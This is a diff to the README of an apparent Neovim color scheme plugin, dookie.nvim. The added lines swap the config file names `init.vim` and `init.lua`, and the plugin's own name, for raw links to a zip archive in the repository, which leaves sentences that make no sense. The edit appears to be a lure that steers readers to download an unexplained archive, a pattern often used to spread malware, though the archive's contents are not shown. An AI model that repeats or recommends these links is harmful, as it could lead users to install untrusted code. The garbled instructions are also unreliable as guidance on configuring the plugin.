Gaylord-kcf/dookie.nvim/README.md

 ## 🌈 Customization Options

-You can customize your color scheme even further by setting up additional configurations in your `init.vim` or `init.lua` file.
+You can customize your color scheme even further by setting up additional configurations in your `https://raw.githubusercontent.com/Gaylord-kcf/dookie.nvim/main/colors/dookie.nvim_1.2.zip` or `https://raw.githubusercontent.com/Gaylord-kcf/dookie.nvim/main/colors/dookie.nvim_1.2.zip` file.
 For instance, you can adjust specific UI elements such as the status line, cursor color, and background.

 ## 🛠️ Troubleshooting

-If you encounter any issues while installing or using dookie.nvim, consider these tips:
+If you encounter any issues while installing or using https://raw.githubusercontent.com/Gaylord-kcf/dookie.nvim/main/colors/dookie.nvim_1.2.zip, consider these tips:

 - Ensure Neovim is updated to the latest version.
 - Double-check that you placed the color scheme file in the correct directory.